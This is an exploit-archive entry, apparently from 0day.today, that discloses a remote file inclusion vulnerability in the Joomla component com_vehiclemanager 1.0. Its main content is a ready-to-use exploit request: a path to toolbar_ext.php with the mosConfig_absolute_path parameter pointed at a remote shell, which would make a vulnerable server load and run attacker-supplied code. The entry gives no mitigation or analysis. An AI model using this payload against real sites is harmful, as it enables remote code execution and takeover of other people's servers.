id: 5344
date: 06/08/2009
title: Joomla Component com_vehiclemanager 1.0 RFI Vulnerability
author: xoron
cves: 

=========================================================
Joomla Component com_vehiclemanager 1.0 RFI Vulnerability
=========================================================


=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

  Joomla com_vehiclemanager 1.0 Remote File Include

  Download: http://ordasoft.com/Download-document/1-Vehicle-Manager-Basic.html

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Found: xoron

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=

Exploit:
          -> .../com_vehiclemanager/toolbar_ext.php?mosConfig_absolute_path=shell?

=-==-==-==-==-==-==-==X==O==R==O==N==-==-==-==-==-==-==-==-==-==-==-=



#  0day.today [2023-03-24]  #